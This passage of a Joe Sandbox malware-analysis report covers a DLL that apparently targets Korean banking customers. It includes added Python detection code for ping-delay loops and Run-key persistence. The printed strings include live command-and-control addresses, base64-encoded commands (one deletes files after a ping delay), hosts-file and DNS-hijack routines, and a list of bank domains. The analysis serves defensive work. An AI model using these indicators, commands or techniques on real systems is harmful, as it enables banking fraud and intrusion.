• Associated: 0000000B.00000002.1845988630.000000001006B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1846020996.000000001006C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1846046754.000000001006D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1846076785.000000001006E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
Similarity
• API ID: InitializeThunk
• String ID: GetUrlCacheEntryInfoA$URLDownloadToCacheFileA$urlmon.dll$wininet.dll
• API String ID: 2994545307-2475139894
• Opcode ID: 58e32ecd4df237d1f6062f21ac533755852c5572bebf91a7140361dded5085fe
• Instruction ID: 07a37e4b5f5db9f07829dfdfef9d508389309d866dd02fd17ced75df8caaf776
• Opcode Fuzzy Hash: 58e32ecd4df237d1f6062f21ac533755852c5572bebf91a7140361dded5085fe
• Instruction Fuzzy Hash: 72313EB690461CBEEB11DBA4CC45FEF7B7DEB08341F5400A6F608AB181D7759A448EA0
APIs
• Sleep.KERNEL32(?,00000000,00000001,00000000,00000000,?), ref: 10004A3A
• wsprintfA.USER32 ref: 10004ADB
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000B.00000002.1845680236.0000000010000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1845746204.000000001000E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1845774606.0000000010012000.00000004.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1845801324.000000001001B000.00000020.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1845844288.000000001003F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1845884030.0000000010061000.00000040.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1845920656.0000000010062000.00000080.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1845952383.000000001006A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1845988630.000000001006B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1846020996.000000001006C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1846046754.000000001006D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1846076785.000000001006E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
Similarity
• API ID: Sleepwsprintf
• String ID: %s|$127.0.0.1$8.8.8.8$ahnlab$alyac$v3lite
• API String ID: 1749205058-4002687564
• Opcode ID: a59fa5bbbfeca0813ebf207540be2f8e1c24db24c18423e471c4f08bbbb05ee2
• Instruction ID: 59076712db6477dadbaa6102d4b2767c56af3142dc1d583c19f1c191fca588aa
• Opcode Fuzzy Hash: a59fa5bbbfeca0813ebf207540be2f8e1c24db24c18423e471c4f08bbbb05ee2
• Instruction Fuzzy Hash: 97B16CB2D0025CAAEB11DBE4CC85EDFBBBCEB45740F0045A6F205A6141EA71AB45CF61
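This function pairs Sleep and wsprintfA with the strings "127.0.0.1" and "8.8.8.8" next to the Korean AV product names ahnlab, alyac and v3lite. Loopback and 8.8.8.8 are the classic targets of "ping -n N" delay loops, so a responder will usually want a rule for that pattern in process-creation telemetry. The block below is an added detection example, not code from the report or the sample; that this particular function builds a ping command line is an assumption (the report shows the strings, not the command), and the command lines it scans are constructed.

```python
"""Detect ping.exe used as a sleep primitive in process command lines.

Added example for detection engineering, not code from the report or the sample.
Assumption: the "127.0.0.1" / "8.8.8.8" strings are ping targets used for delay.
Rule of thumb: Windows ping sends one echo request per second, so
"ping -n N <answering host>" takes about N-1 seconds.
"""
import re
import shlex

PING_RE = re.compile(r"(?:^|\\)ping(?:\.exe)?$", re.I)
SLEEP_TARGETS = {"127.0.0.1", "localhost", "8.8.8.8"}   # hosts that reliably answer
OPTS_WITH_ARG = {"-l", "-i", "-v", "-r", "-s", "-j", "-k", "-w", "-c"}  # Windows ping options taking a value
SHELL_BREAK = {"&", "&&", "|", "||", ">", ">>", "<"}

SAMPLE_CMDLINES = [   # constructed, not taken from the analysis
    'cmd.exe /c ping -n 30 127.0.0.1 > nul & del "C:\\Users\\Public\\x.dll"',
    'ping.exe -n 1 8.8.8.8',
    '"C:\\Windows\\System32\\PING.EXE" -n 60 -w 1000 127.0.0.1',
    'ping -n 3 fileserver.corp.example',
]


def parse_ping(cmdline):
    """Return (target, count) for a ping invocation anywhere in cmdline, else None."""
    try:
        argv = shlex.split(cmdline, posix=False)     # keep Windows quoting intact
    except ValueError:
        return None
    start = next((i for i, t in enumerate(argv) if PING_RE.search(t.strip('"'))), None)
    if start is None:
        return None
    target, count, i = None, 4, start + 1            # Windows default: 4 echo requests
    while i < len(argv) and argv[i] not in SHELL_BREAK:
        tok = argv[i].lower()
        if tok in ("-n", "/n") and i + 1 < len(argv) and argv[i + 1].isdigit():
            count = int(argv[i + 1])
            i += 2
            continue
        if tok in OPTS_WITH_ARG:                      # skip the option and its value
            i += 2
            continue
        if not tok.startswith(("-", "/")):
            target = argv[i].strip('"')
        i += 1
    return target, count


def estimated_delay_seconds(count):
    """Approximate wall-clock delay of "ping -n count" against an answering host."""
    return max(count - 1, 0)


def is_ping_sleep(cmdline, min_seconds=10):
    """True when the command pings a known-answering host long enough to be a sleep."""
    parsed = parse_ping(cmdline)
    if parsed is None:
        return False
    target, count = parsed
    return target in SLEEP_TARGETS and estimated_delay_seconds(count) >= min_seconds


if __name__ == "__main__":
    for c in SAMPLE_CMDLINES:
        print(is_ping_sleep(c), parse_ping(c), c)
```

A single "ping -n 1 8.8.8.8" is a connectivity check, not a sleep, which is why the rule keys on the estimated delay and not on the target alone; lower min_seconds if the sample's loops are short.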
APIs
  • Part of subcall function 10003FF7: GetShortPathNameA.KERNEL32(?,?,?), ref: 10004003
  • Part of subcall function 1000406C: RegCreateKeyExA.ADVAPI32(?,?,?,?,?,?,?,?,?), ref: 1000408A
• wsprintfA.USER32 ref: 10006DAB
• ___crtGetTimeFormatEx.LIBCMT ref: 10006DD1
  • Part of subcall function 100040D4: RegSetValueExA.ADVAPI32(?,?,?,?,?,?), ref: 100040E9
  • Part of subcall function 10004092: RegCloseKey.ADVAPI32(?,10005E30,?,?,ProcessorNameString,00000000,00000004,?,?,80000002,?,00000000,000F003F,?), ref: 10004096
Strings
• REG_SZ, xrefs: 10006D67
• U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==, xrefs: 10006D6D
• %s "%s",ClassObject, xrefs: 10006DA5
• COAPI, xrefs: 10006DC9
Memory Dump Source
• Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
• Associated: 0000000B.00000002.1845680236.0000000010000000.00000002.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1845746204.000000001000E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1845774606.0000000010012000.00000004.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1845801324.000000001001B000.00000020.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1845844288.000000001003F000.00000080.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1845884030.0000000010061000.00000040.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1845920656.0000000010062000.00000080.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1845952383.000000001006A000.00000040.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1845988630.000000001006B000.00000080.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1846020996.000000001006C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1846046754.000000001006D000.00000080.00000001.01000000.00000003.sdmp
• Associated: 0000000B.00000002.1846076785.000000001006E000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
Similarity
• API ID: CloseCreateFormatNamePathShortTimeValue___crtwsprintf
• String ID: %s "%s",ClassObject$COAPI$REG_SZ$U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==
• API String ID: 1762869224-2622945652
• Opcode ID: fbfcc2b6831f484961dad07c1014c2de558b5a5ead880f6592c8572077f3b4ee
• Instruction ID: 1af9319de0d48fb467b647ae3650b89cedd961ef50c791020d1a6b5894edbf87
• Opcode Fuzzy Hash: fbfcc2b6831f484961dad07c1014c2de558b5a5ead880f6592c8572077f3b4ee
• Instruction Fuzzy Hash: BA11B2B694411CBEFB11D3A4DC86FEA776CDB14380F1004A1F744B9085EAB16FC88AA4
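Two functions in this module hide configuration strings behind base64: the earlier one with the MSIE 8.0 User-Agent carries aHR0cDovL2Jsb2cuc2luYS5jb20uY24vdS8lcw==, which decodes to http://blog.sina.com.cn/u/%s, and the function above carries U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==, which decodes to Software\\Microsoft\\Windows\\CurrentVersion\\Run (with the backslashes doubled exactly as encoded, i.e. a C-escaped literal was fed to the encoder). Together with GetShortPathNameA, RegCreateKeyExA, RegSetValueExA, the REG_SZ string and the template %s "%s",ClassObject, this is a Run-key autostart that launches the DLL through rundll32 with the export ClassObject. The block below is an added example covering both functions; it is not code from the report or the sample. The decodes are exact; what it assumes is that the first %s is the rundll32 host path and the second the (8.3 short) DLL path, that the value is written under the decoded Run key with the name COAPI, and that the Sina blog URL is a dead-drop resolver whose page title carries the next address (the "title" string in the earlier function). The registry entries it inspects are constructed.

```python
"""Decode the base64 configuration strings of this module and flag the Run-key persistence.

Added example, not code from the Joe Sandbox report or from the sample.
Exact: the two base64 decodes. Assumptions: argument order of the
'%s "%s",ClassObject' template, the value name "COAPI", and that the Sina URL
is a dead-drop resolver. Registry entries below are constructed.
"""
import base64
import re

OBFUSCATED = {   # both strings copied from the report
    "dead_drop_url": "aHR0cDovL2Jsb2cuc2luYS5jb20uY24vdS8lcw==",
    "run_key": "U29mdHdhcmVcXE1pY3Jvc29mdFxcV2luZG93c1xcQ3VycmVudFZlcnNpb25cXFJ1bg==",
}
RUN_VALUE_TEMPLATE = '%s "%s",ClassObject'     # printf-style template from the report


def decode_config():
    """Decode every obfuscated string. The Run key decodes with doubled backslashes
    (the author encoded a C-escaped literal), so normalise before comparing."""
    return {k: base64.b64decode(v).decode("ascii") for k, v in OBFUSCATED.items()}


def normalised_run_key():
    """Run key path as it would appear in the registry, single backslashes."""
    return decode_config()["run_key"].replace("\\\\", "\\")


def dead_drop_url(profile_id):
    """Fill the %s slot of the decoded URL template (what the sample substitutes is unknown)."""
    return decode_config()["dead_drop_url"] % profile_id


def build_run_value(rundll32_path, dll_short_path):
    """Expected autostart command under the argument order assumed above."""
    return RUN_VALUE_TEMPLATE % (rundll32_path, dll_short_path)


# rundll32 host (bare or quoted), quoted or bare DLL path, then ",Export"
RUNDLL_RE = re.compile(
    r'^"?(?P<host>[^"\s]*rundll32(?:\.exe)?)"?\s+"?(?P<dll>[^",]+?)"?\s*,\s*(?P<export>[A-Za-z_][\w@]*)',
    re.I,
)


def inspect_run_value(value):
    """Describe a Run-key value that launches a DLL via rundll32; None otherwise."""
    m = RUNDLL_RE.match(value.strip())
    if not m:
        return None
    return {
        "dll": m["dll"],
        "export": m["export"],
        "short_name": "~" in m["dll"],        # 8.3 path, consistent with GetShortPathNameA
        "sample_pattern": m["export"] == "ClassObject",
    }


SAMPLE_RUN_ENTRIES = {   # constructed HKCU\...\Run contents, not from the analysis
    "OneDrive": '"C:\\Users\\u\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe" /background',
    "COAPI": build_run_value("C:\\Windows\\system32\\rundll32.exe", "C:\\Windows\\EXAMPL~1.DLL"),
    "Updater": 'rundll32.exe "C:\\ProgramData\\u.dll",Launch',
}


def suspicious_run_entries(entries):
    """Return {value_name: details} for every rundll32-based autostart entry."""
    found = {}
    for name, value in entries.items():
        info = inspect_run_value(value)
        if info:
            found[name] = info
    return found


if __name__ == "__main__":
    print(decode_config())
    print(normalised_run_key())
    for name, info in suspicious_run_entries(SAMPLE_RUN_ENTRIES).items():
        print(name, info)
```

Any rundll32 entry under a Run key deserves a look; the combination of an 8.3 short path and the export name ClassObject is the pattern specific to this sample, so the detector reports both facts separately rather than only the exact match.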
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          • www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.ki|www.knbank.co.kr.ki|openbank.cu.co.kr.ki|www.busanbank.co.kr.ki|www.nonghyup.com.ki|www.shinhan.com.ki|www.wooribank.com.ki|www.hanabank.com.ki|www.epostbank.go.kr.ki|www.ibk.co.kr.ki|www.idk.c, xrefs: 1000534E
                                                                                                                                                                          • , xrefs: 10005394
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
Similarity
• API ID: InitializeThunk
• String ID: $www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.ki|www.knbank.co.kr.ki|openbank.cu.co.kr.ki|www.busanbank.co.kr.ki|www.nonghyup.com.ki|www.shinhan.com.ki|www.wooribank.com.ki|www.hanabank.com.ki|www.epostbank.go.kr.ki|www.ibk.co.kr.ki|www.idk.c
• API String ID: 2994545307-230412946
APIs
• wsprintfA.USER32 ref: 10008847
• Sleep.KERNEL32(000007D0,?,?,00000000), ref: 10008868
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1845801324.000000001001B000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
Similarity
• API ID: Sleepwsprintf
• String ID: 7$SK$SeDebugPrivilege$Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=
• API String ID: 1749205058-3701087130
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
Similarity
• API ID: Sleep$wsprintf
• String ID: D$aHR0cDovLzEwNy4xNjMuNTYuMTEwOjE4NTMwL3UxMTI5Lmh0bWw=$c:\%d.log
• API String ID: 3195947292-1533272838
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
Similarity
• API ID: strcspn$FormatTime___crt
• String ID: http://
• API String ID: 4006067733-1121587658
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
Similarity
• API ID: InitializeThunkwsprintf
• String ID: %s\%s$.$\*.*
• API String ID: 2324811901-2210278135
APIs
  • Part of subcall function 10003ECE: CreateMutexA.KERNEL32(?,?,?,10006B73,00000000,00000000,?,?,00000202,?), ref: 10003EDA
• GetLastError.KERNEL32 ref: 10006ACB
  • Part of subcall function 100064AB: wsprintfA.USER32 ref: 10006509
  • Part of subcall function 100064AB: ___crtGetTimeFormatEx.LIBCMT ref: 10006558
• Sleep.KERNEL32(0002BF20), ref: 10006B00
• CreateThread.KERNEL32(00000000,00000000,10006890,00000000,00000000,00000000), ref: 10006B14
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
Similarity
• API ID: Create$ErrorFormatLastMutexSleepThreadTime___crtwsprintf
• String ID: 0x5d65r455f$5762479093
• API String ID: 3244495550-2446933972
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
Similarity
• API ID:
• String ID: /$UT
• API String ID: 0-1626504983
APIs
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
Similarity
• API ID: InitializeThunk
• String ID: %s%s$cmd.exe$log.txt
• API String ID: 2994545307-357432712
APIs
  • Part of subcall function 10003F72: PathFileExistsA.SHLWAPI(?,10005CA4,?,?,%s\lang.ini,100167E0), ref: 10003F76
• Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005D73
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
Similarity
• API ID: Timer$Concurrency::details::platform::__CreateExistsFilePathQueue
• String ID: %s\lang.ini$http://$search
• API String ID: 1721638100-482061809
APIs
Strings
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
Similarity
• API ID: Sleep
• String ID: 107.163.56.232:18963/main.php$L2ltYWdlLnBocA==$P
APIs
• wsprintfA.USER32 ref: 10008847
• Sleep.KERNEL32(000007D0,?,?,00000000), ref: 10008868
Strings
• Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=, xrefs: 10008833
• SeDebugPrivilege, xrefs: 10034413
Memory Dump Source
• Source File: 0000000B.00000002.1845801324.000000001001B000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
Similarity
• API ID: Sleepwsprintf
• String ID: SeDebugPrivilege$Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
Similarity
• API ID: InitVariant
• String ID: $p=Vu
APIs
  • Part of subcall function 10003F72: PathFileExistsA.SHLWAPI(?,10005CA4,?,?,%s\lang.ini,100167E0), ref: 10003F76
• Concurrency::details::platform::__CreateTimerQueueTimer.LIBCMT ref: 10005CC8
Strings
Memory Dump Source
• Source File: 0000000B.00000002.1845711802.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_10000000_rundll32.jbxd
Similarity
• API ID: Timer$Concurrency::details::platform::__CreateExistsFilePathQueue
• String ID: %s\lang.ini$http://

Execution Graph

Execution Coverage: 0.6%
Dynamic/Decrypted Code Coverage: 0%
Signature Coverage: 0%
Total number of Nodes: 28
Total number of Limit Nodes: 0
APIs
• SafeArrayCreate.OLEAUT32(00000008,00000001,?), ref: 1000735B
• VariantInit.OLEAUT32(?), ref: 10007370
• SafeArrayCreate.OLEAUT32(00000003,00000001,?), ref: 1000738B
• VariantInit.OLEAUT32(?), ref: 1000739A
  • Part of subcall function 10007A85: VariantInit.OLEAUT32(?), ref: 10007AC4
• SafeArrayCreate.OLEAUT32(00000008,00000001,00000002), ref: 10007528
• VariantInit.OLEAUT32(?), ref: 10007536
Strings
Memory Dump Source
• Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
Similarity
• API ID: InitVariant$ArrayCreateSafe
• String ID: DNSServerSearchOrder$DefaultIPGateway$GatewayCostMetric$IPEnabled=TRUE$Index$SetDNSServerSearchOrder$SetGateways$Win32_NetworkAdapterConfiguration$Win32_NetworkAdapterConfiguration.Index=$p=Vu
                                                                                                                                                                          • API String ID: 2640012081-1190809373
                                                                                                                                                                          • Opcode ID: 6823ad11a6899495a2cd4c7f92812f7426581cc924e117c154152219d25b498c
                                                                                                                                                                          • Instruction ID: 9ca97b7ebb433752ffed003b4f688b974b795f87ac827d3fa99277f148b18eb5
                                                                                                                                                                          • Opcode Fuzzy Hash: 6823ad11a6899495a2cd4c7f92812f7426581cc924e117c154152219d25b498c
                                                                                                                                                                          • Instruction Fuzzy Hash: EDD16074D00219EFEB15CFA4C8809EEBBB5FF04781F204419F419AB259DB75AA45CFA1
                                                                                                                                                                          APIs
                                                                                                                                                                          • wsprintfA.USER32 ref: 10005449
                                                                                                                                                                            • Part of subcall function 1000532A: LdrInitializeThunk.NTDLL ref: 1000538F
                                                                                                                                                                            • Part of subcall function 1000532A: LdrInitializeThunk.NTDLL ref: 1000539C
                                                                                                                                                                            • Part of subcall function 1000532A: LdrInitializeThunk.NTDLL ref: 100053A5
                                                                                                                                                                            • Part of subcall function 1000532A: LdrInitializeThunk.NTDLL ref: 100053B2
                                                                                                                                                                          • wsprintfA.USER32 ref: 100054B0
                                                                                                                                                                          • wsprintfA.USER32 ref: 100054CE
                                                                                                                                                                          • PrintFile.2JSGOLBNYM(?,?,76078400,?,00000000), ref: 100054F0
                                                                                                                                                                          • rand.MSVCRT ref: 1000553C
                                                                                                                                                                          • rand.MSVCRT ref: 1000554A
                                                                                                                                                                          • rand.MSVCRT ref: 10005555
                                                                                                                                                                          • rand.MSVCRT ref: 10005560
                                                                                                                                                                          • rand.MSVCRT ref: 1000556B
                                                                                                                                                                          • rand.MSVCRT ref: 10005576
                                                                                                                                                                          • wsprintfA.USER32 ref: 10005594
                                                                                                                                                                          • Sleep.KERNEL32(000003E8,?,40000000,00000001,00000000,00000002,00000000,00000000), ref: 100055C0
                                                                                                                                                                          Strings
                                                                                                                                                                          • Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj, xrefs: 10005581
                                                                                                                                                                          • Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz, xrefs: 100054BB
                                                                                                                                                                          • c:\windows\system32\drivers\%s, xrefs: 100054AA
                                                                                                                                                                          • %s\%s, xrefs: 10005443
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
Similarity
• API ID: rand$InitializeThunkwsprintf$FilePrintSleep
• String ID: %s\%s$Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz$Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj$c:\windows\system32\drivers\%s
• API String ID: 3997227624-455112146
• Opcode ID: 206c3190cb66ea6a56bf29271a8aac36d6d2460ff59ef33fb6fc1b7929c08015
• Instruction ID: 707e71cc3576b89c72abdeb88e14083c0e5233f75fe593892cbd880b6aeee3b6
• Opcode Fuzzy Hash: 206c3190cb66ea6a56bf29271a8aac36d6d2460ff59ef33fb6fc1b7929c08015
• Instruction Fuzzy Hash: 7C61F973A00258BFEB14DB64CC46FEB77AEEB84351F144466FA049B1D0DB76EA848A50
APIs
• Sleep.KERNEL32(0000EA60), ref: 10006F47
• LdrInitializeThunk.NTDLL ref: 10006FAE
• LdrInitializeThunk.NTDLL ref: 10006FC5
• Sleep.KERNEL32 ref: 1000707C
• wsprintfA.USER32 ref: 100070C0
• PrintFile.2JSGOLBNYM(00000000,?,00000000), ref: 100070F9
• PrintFile.2JSGOLBNYM(00000000,?,00000000,?,00000000), ref: 1000710C
Strings
Memory Dump Source
• Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
Similarity
• API ID: FileInitializePrintSleepThunk$wsprintf
• String ID: QVNEU3ZjLmV4ZQ==$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$c:\1.txt$http://107.163.56.232:18963/main.php$iOffset
• API String ID: 983772623-3558339448
• Opcode ID: e9197fde65b9021ebe71187dcdd8314e6f7fab53b25e944f359161cf35a65764
• Instruction ID: fb61bf4e8c3f987df104399158fbbd5fa82b7bd29b5b13544636659ff5ce8687
• Opcode Fuzzy Hash: e9197fde65b9021ebe71187dcdd8314e6f7fab53b25e944f359161cf35a65764
• Instruction Fuzzy Hash: 7551D8B6D04359BAF721D764CC55FCE77ACEB08381F2045A1F208AA086DA75BB808E51
APIs
• VariantInit.OLEAUT32(?), ref: 10004ED7
• VariantInit.OLEAUT32(?), ref: 10004EDD
• VariantInit.OLEAUT32(?), ref: 10004EE3
• VariantInit.OLEAUT32(?,?,?,00000000), ref: 10005021
Strings
Memory Dump Source
• Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
Similarity
• API ID: InitVariant
• String ID: CommandLine$Name$ProcessID$SELECT * FROM $WQL$p=Vu$svchost.exe$svchost.exe -k NetworkService
• API String ID: 1927566239-3240772352
• Opcode ID: 809660576abba3bc831f7d966f247150da8ea1521fee35fef51387eeb5a2eb78
• Instruction ID: 9d9a7b9c9ad05fb17601a1e21a41dbb997ac73afb50a28aca2ce94161bb16792
• Opcode Fuzzy Hash: 809660576abba3bc831f7d966f247150da8ea1521fee35fef51387eeb5a2eb78
• Instruction Fuzzy Hash: 2AA14AB5900209AFEB04DFA4CC81DEEBBB8FF48394F104569F515AB294CB31AE45CB60
APIs
Strings
• 8.8.8.8, xrefs: 10008412
• http://107.163.56.232:18963/main.php, xrefs: 10008376
• XGRyaXZlcnNcZXRjXGhvc3Rz, xrefs: 100082E8
• 127.0.0.1, xrefs: 10008417
• Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM=, xrefs: 10008428
• XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==, xrefs: 100082FF
Memory Dump Source
• Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
Similarity
• API ID: InitializeThunk$Sleepwsprintf
• String ID: 127.0.0.1$8.8.8.8$XGRyaXZlcnNcZXRjXGhvc3Rz$XGRyaXZlcnNcZXRjXGhvc3RzLmljcw==$Y21kLmV4ZSAvYyBpcGNvbmZpZyAvZmx1c2hkbnM=$http://107.163.56.232:18963/main.php
• API String ID: 2795264321-515792873
• Opcode ID: 512cc08456b3741649836ced6ecb96ad062b60418455557be70083cdc6fec90e
• Instruction ID: 8dd24be72779d1db326892d4824c811f5291eb1f4f1f793922e2c79d5d000f77
• Opcode Fuzzy Hash: 512cc08456b3741649836ced6ecb96ad062b60418455557be70083cdc6fec90e
• Instruction Fuzzy Hash: A44109B6D0425976FB21D364CC56FCF7B6CEB44280F2045A5F248BA086DAB4AB844F55
APIs
Strings
Memory Dump Source
• Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
Similarity
• API ID: wsprintf
• String ID: %s\%s$%s\version.txt$107.163.56.251:6658$12091507$F896SD5DAE$M%s
• API String ID: 2111968516-1696321353
• Opcode ID: c5f75ce024e5877d67f2cb652d7117067222741117a7b19a033c173ca86ea290
• Instruction ID: 2c0e65cf9d0f003dd0541039253934f55528cad486157ddc35f7c3791a233049
• Opcode Fuzzy Hash: c5f75ce024e5877d67f2cb652d7117067222741117a7b19a033c173ca86ea290
• Instruction Fuzzy Hash: 1C1127756007587BF210E7619C85F5F7E5CDF896EAF01012AF6049E181DB76EC808672
APIs
• wsprintfA.USER32 ref: 10006509
  • Part of subcall function 10003F0A: InternetOpenA.WININET(7A4A585A,30564758,6C773159,6A567959,754D574A), ref: 10003F1C
• ___crtGetTimeFormatEx.LIBCMT ref: 10006558
  • Part of subcall function 10003F24: InternetOpenUrlA.WININET(326C6D63,7A4A585A,30564758,6C773159,6A567959,754D574A), ref: 10003F39
  • Part of subcall function 10003F41: InternetReadFile.WININET(?,?,?,?), ref: 10003F51
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000,?,?,?,10017BAC,10017BAC,00000000,00000000), ref: 100065DA
• MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,?,?,?,?,10017BAC,10017BAC,00000000,00000000), ref: 100065F8
• wsprintfA.USER32 ref: 100066FB
Strings
Memory Dump Source
• Source File: 00000013.00000002.1873046994.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_19_2_10000000_rundll32.jbxd
Similarity
• API ID: Internet$ByteCharMultiOpenWidewsprintf$FileFormatReadTime___crt
